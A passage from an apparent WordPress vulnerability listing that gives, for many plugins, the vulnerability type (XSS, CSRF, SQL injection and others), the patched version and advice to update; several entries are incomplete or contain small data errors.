Recommended Action: Update to version 3.3.6, or a newer patched version

Plugin: WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: Logs Deletion via Cross-Site Request Forgery
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: WooCommerce Multi Currency

Vulnerability: Missing Authorization
Patched Version: 2.1.18
Recommended Action: Update to version 2.1.18, or a newer patched version

Plugin: No Page Comment

Vulnerability: Cross-Site-Request Forgery to Settings Change
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: wp-easybooking

Plugin: Easy Team Manager

Plugin: Total Security

Vulnerability: Unauthenticated Settings Change
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Easy Contact Form Builder

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Sayfa Sayac

Plugin: So Audible Cloud Music Player

Plugin: WP-Polls

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.71
Recommended Action: Update to version 2.71, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via html_tag
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Tevolution

Vulnerability: Arbitrary File Upload
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Language Bar Flags

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Better Find and Replace

Vulnerability: Admin+ SQL Injection
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: CRM and Lead Management by vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Arbitrary Post Duplication
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Parcel Tracker eCourier

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: intimate Payments Plugin

Plugin: [GWA] AutoResponder

Plugin: Marketing Twitter Bot

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Membership Simplified

Plugin: SP Rental Manager

Plugin: Contact Form DB – Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: tarteaucitron.js – Cookies legislation & GDPR

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in save_admin_widgets function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Auto Amazon Links – Amazon Associates Affiliate Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘bulkDelete’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Copy or Move Comments

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Baidu Tongji generator

Plugin: Organization chart

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: WP EasyPay – Create Your Payment Forms to Pay with Square – Square for WordPress Plugin: Integrate Square with WordPress to Collect Payments

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Contact Us Page – Contact People

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 6.6.16
Recommended Action: Update to version 6.6.16, or a newer patched version

Plugin: Brute Force Login Protection

Plugin: WP Learn Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Missing Authorization
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: Real-Time Find and Replace

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Product Carousel, Product Slider, Product Grid Gallery, and Product Table for WooCommerce – WooProduct Slider

Vulnerability: Missing Authorization
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Email Spoofing
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: OpenID Connect Generic Client

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Contact Form With Captcha

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Web3 – Crypto wallet Login & NFT token gating

Vulnerability: Authentication Bypass
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: WooCommerce Google Sheet Connector

Plugin: Modal Survey – WordPress Poll, Survey & Quiz Plugin

Vulnerability: PHP Object Injection
Patched Version: 2.0.1.8.2
Recommended Action: Update to version 2.0.1.8.2, or a newer patched version

Plugin: Autopost for X (formerly Autoshare for Twitter)

Vulnerability: Denial of Service
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Shantz WordPress QOTD

Plugin: Social Proof (Testimonial) Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Remote File Inclusion
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: lightbox

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery to plugin deactivation
Patched Version: 2.33.4
Recommended Action: Update to version 2.33.4, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: WooCommerce Upload Files

Vulnerability: Arbitrary File Upload
Patched Version: 59.4
Recommended Action: Update to version 59.4, or a newer patched version

Plugin: Enqueue Anything

Plugin: Site Kit by Google – Analytics, Search Console, AdSense, Speed

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Field
Patched Version: 6.2.5
Recommended Action: Update to version 6.2.5, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Insecure Direct Object Reference to Forum Privacy Change
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Metricool

Vulnerability: Authenticated (Administrator+) Stored Stored Cross-Site Scripting
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: Protect uploads

Vulnerability: Authorization Bypass
Patched Version: 0.4
Recommended Action: Update to version 0.4, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via bg_color parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.46
Recommended Action: Update to version 1.1.46, or a newer patched version

Plugin: Mail Masta

Plugin: HyperComments

Plugin: D-Bargain

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery via edd_trigger_upgrades
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Droit Dark Mode

Plugin: Image Source Control Lite – Show Image Credits and Captions

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.17.1
Recommended Action: Update to version 2.17.1, or a newer patched version

Plugin: RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: Stop User Enumeration

Vulnerability: User Enumeration
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Easy2Map

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: plugnedit

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Lava Directory Manager

Plugin: Image Gallery – Grid Gallery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: ImageInject

Vulnerability: Authenticated (Admin+) Stored XSS
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Authenticated Information Disclosure
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Calendar

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Plugin: Simple add pages or posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: WP Page Builder

Vulnerability: Insecure Default to Unauthorized Page Editing
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Google Map Shortcode

Vulnerability: Cross-Site Request Forgery to Plugin Setting Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Archivist – Custom Archive Templates

Plugin: VS Contact Form

Vulnerability: Missing Authorization
Patched Version: 14.0
Recommended Action: Update to version 14.0, or a newer patched version

Plugin: MaxGalleria

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.2.7
Recommended Action: Update to version 6.2.7, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: Sitemap by BestWebSoft – WordPress XML Site Map Page Generator Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Locatoraid Store Locator

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.9.19
Recommended Action: Update to version 3.9.19, or a newer patched version

Plugin: WP GoToWebinar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 14.46
Recommended Action: Update to version 14.46, or a newer patched version

Plugin: RVM – Responsive Vector Maps

Vulnerability: Responsive Vector Maps <= 6.4.1
Patched Version: 6.4.2
Recommended Action: Update to version 6.4.2, or a newer patched version

Plugin: Contact Form 7

Vulnerability: CAPTCHA Bypass
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar

Vulnerability: Multiple Admin+ Cross Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: MobileChief

Plugin: My wpdb

Vulnerability: Cross-Site Request Forgery to Arbitrary SQL Query Execution
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Broken Link Checker | Finder

Vulnerability: Missing Authorization via moblc_auth_save_settings
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Gallery – Photo Albums Plugin

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 1.3.03
Recommended Action: Update to version 1.3.03, or a newer patched version

Plugin: WP Smart Preloader

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.15.1
Recommended Action: Update to version 1.15.1, or a newer patched version

Plugin: Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps)

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.12.5
Recommended Action: Update to version 3.12.5, or a newer patched version

Plugin: WP All Export Pro

Vulnerability: Authenticated SQL Injection
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Product Vendors

Vulnerability: Missing Authorization
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Structured Content (JSON-LD) #wpsc

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Easy Coming Soon

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AdFoxly – Ad Manager, AdSense Ads & Ads.txt

Plugin: Advance Search for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Etsy Shop

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: DOOFINDER Search and Discovery for WP & WooCommerce

Vulnerability: Reflected Cross-Site Scripting via tab
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Sensitive Data Exposure
Patched Version: 1.15.0.1
Recommended Action: Update to version 1.15.0.1, or a newer patched version

Plugin: Bad Behavior

Vulnerability: 2.2.4
Patched Version: 2.0.47
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.47, 2.2.5

Plugin: Calculated Fields Form

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.121
Recommended Action: Update to version 1.1.121, or a newer patched version

Plugin: Imagements

Plugin: Social comments by WpDevArt

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Blocksy Companion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8.68
Recommended Action: Update to version 1.8.68, or a newer patched version

Plugin: BuddyBoss Media

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Media Library Folders

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.68
Recommended Action: Update to version 4.68, or a newer patched version

Plugin: Page View Count

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.4.15
Recommended Action: Update to version 2.4.15, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Unauthenticated CSV Injection
Patched Version: 3.1.0.2
Recommended Action: Update to version 3.1.0.2, or a newer patched version

Plugin: WP Video Lightbox

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 11.1.12
Recommended Action: Update to version 11.1.12, or a newer patched version

Plugin: Sharebar

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Find My Blocks – Locate blocks on your site

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Simple Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.6
Recommended Action: Update to version 4.3.6, or a newer patched version

Plugin: Slick Popup: Contact Form 7 Popup Plugin

Vulnerability: Privilege Escalation
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: WP Coder – Code Snippets + HTML, CSS, JS and PHP Injection

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via logo_height parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: InstaSqueeze Sexy Squeeze Pages

Plugin: MF Gig Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Unauthenticated Backup Download
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: 10Web Booster – Website speed optimization, Cache & Page Speed optimizer

Vulnerability: Unauthenticated Arbitrary Option Deletion
Patched Version: 2.24.18
Recommended Action: Update to version 2.24.18, or a newer patched version

Plugin: WP Crowdfunding

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: WP Editor

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.6.3
Recommended Action: Update to version 1.2.6.3, or a newer patched version

Plugin: Media File Manager Advanced

Plugin: Pinterest Automatic

Vulnerability: Unuathenticated Arbitrary Options Update
Patched Version: 4.14.4
Recommended Action: Update to version 4.14.4, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Ultimate Dashboard – Custom WordPress Dashboard

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: Animate It!

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: Thumbnail Slider With Lightbox

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Testimonial Slider

Vulnerability: SQL Injection
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.24
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.24, 3.8.24, 3.9.22, 4.0.21, 4.1.21, 4.2.18, 4.3.14, 4.4.13, 4.5.12, 4.6.9, 4.7.8, 4.8.4, 4.9.1

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_unassign_folders
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Cross-Site Scripting via post_title
Patched Version: 6.0.14
Recommended Action: Update to version 6.0.14, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.16
Recommended Action: Update to version 3.2.16, or a newer patched version

Plugin: Simple Membership

Vulnerability: Account Takeover via Password Reset
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Quizlord

Core: WordPress

Vulnerability: Backdoor
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Privilege Escalation
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Plugin: MyCryptoCheckout – Bitcoin, Ethereum, and 100+ altcoins for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.126
Recommended Action: Update to version 2.126, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.14.12
Recommended Action: Update to version 1.14.12, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 4.6.3
Recommended Action: Update to version 4.6.3, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.70
Recommended Action: Update to version 2.0.70, or a newer patched version

Plugin: Post Duplicator

Vulnerability: Missing Authorization via mtphr_duplicate_post
Patched Version: 2.32
Recommended Action: Update to version 2.32, or a newer patched version

Plugin: Product Visibility by Country for WooCommerce

Plugin: podpress

Vulnerability: Cross-Site Scripting via playerID
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Apptivo Business Site CRM

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.14
Recommended Action: Update to version 3.0.14, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Administrator+) Local File Inclusion
Patched Version: 7.5.4
Recommended Action: Update to version 7.5.4, or a newer patched version

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.16.45
Recommended Action: Update to version 1.16.45, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via coming-soon_sub_title parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Affiliate Ads for cbAds.com

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.31
Recommended Action: Update to version 1.31, or a newer patched version

Plugin: Simple Share Buttons Adder

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.4.7
Recommended Action: Update to version 8.4.7, or a newer patched version

Plugin: WP Custom Admin Interface

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 7.29
Recommended Action: Update to version 7.29, or a newer patched version

Plugin: Wp-ImageZoom

Vulnerability: SQL Injection
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Display Widgets

Vulnerability: SEO Spam Injection (Hidden Functionality)
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Directory Traversal to File Deletion on Windows Hosts
Patched Version: 7.59
Recommended Action: Update to version 7.59, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.12.4
Recommended Action: Update to version 1.12.4, or a newer patched version

Plugin: Alter

Plugin: RAYS Grid

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Update Theme and Plugins from Zip File

Plugin: SpiderCalendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.14
Recommended Action: Update to version 1.4.14, or a newer patched version

Plugin: Syndication Links

Vulnerability: DOM-based Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Donate by BestWebSoft – Donations Acception Extention for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: flowpaper

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: FormCraft

Vulnerability: SQL Injection
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: CHP Ads Block Detector

Vulnerability: Cross-Site Request Forgery via chp_abd_action
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: Backup Bank: WordPress Backup Plugin

Vulnerability: Missing Authorization via post_user_feedback_backup_bank
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Like Button Rating ♥ LikeBtn

Vulnerability: Arbitrary e-mail Sending
Patched Version: 2.6.45
Recommended Action: Update to version 2.6.45, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: File Upload
Patched Version: 5.12.3
Recommended Action: Update to version 5.12.3, or a newer patched version

Plugin: Mediamatic – Media Library Folders

Plugin: Plugin for Google Reviews

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Responsive Gallery Grid

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease!

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Z-URL Preview

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Core: WordPress

Vulnerability: Informational
Patched Version: No patched version available
Recommended Action: No known patch available. Review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance.

Plugin: Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.5.9
Recommended Action: Update to version 3.3.5.9, or a newer patched version

Plugin: Image Optimizer by 10web – Image Optimizer and Compression plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: Kwayy HTML Sitemap

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scipting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: core plugin for kitestudio themes

